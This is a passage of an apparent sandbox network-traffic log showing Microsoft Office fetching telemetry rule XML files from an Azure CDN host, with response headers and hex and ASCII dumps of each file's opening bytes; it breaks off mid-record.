                                                2024-10-29 23:23:03 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.45814913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:04 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:04 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1395
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                ETag: "0x8DC582BDE12A98D"
                                                x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232304Z-16849878b786jv8w2kpaf5zkqs0000000660000000001x6r
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:04 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.45815013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:04 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:04 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1358
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                ETag: "0x8DC582BE022ECC5"
                                                x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232304Z-16849878b785dznd7xpawq9gcn00000008q0000000002sza
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:04 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.45815113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:04 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:04 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1389
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                ETag: "0x8DC582BE10A6BC1"
                                                x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232304Z-15b8d89586fmhkw429ba5n22m800000008s0000000004xez
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:04 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.45815313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:04 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:04 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1405
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                ETag: "0x8DC582BE12B5C71"
                                                x-ms-request-id: 4e087ea8-e01e-0099-0e5a-28da8a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232304Z-15b8d89586ffsjj9qb0gmb1stn0000000bcg00000000avhc
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:04 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.45815213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:04 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:04 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1352
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                ETag: "0x8DC582BE9DEEE28"
                                                x-ms-request-id: 75b99f9f-001e-0079-56b6-2612e8000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232304Z-r197bdfb6b46kdskt78qagqq1c00000007k0000000000r44
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:04 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.45815413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1368
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                ETag: "0x8DC582BDDC22447"
                                                x-ms-request-id: df5d8003-e01e-0099-48f7-26da8a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-17c5cb586f6g6g2sa7kg5c0gg000000002d000000000k9tv
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.45815513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:04 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1401
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                ETag: "0x8DC582BE055B528"
                                                x-ms-request-id: d0af8e75-601e-0050-7953-272c9c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-r197bdfb6b4grkz4xgvkar0zcs00000006x000000000ba87
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.45815613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1364
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                ETag: "0x8DC582BE1223606"
                                                x-ms-request-id: af778f23-101e-007a-027e-27047e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-17c5cb586f6g6g2sa7kg5c0gg000000002hg0000000065u0
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.45815713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1397
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                ETag: "0x8DC582BE7262739"
                                                x-ms-request-id: 9cf5c506-801e-0083-443d-26f0ae000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-17c5cb586f6hhlf5mrwgq3erx800000008kg00000000ctq8
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.45815813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1360
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                ETag: "0x8DC582BDDEB5124"
                                                x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232305Z-16849878b7828dsgct3vrzta7000000005pg000000007g3k
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:05 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.45815913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:05 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:05 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:05 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1403
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
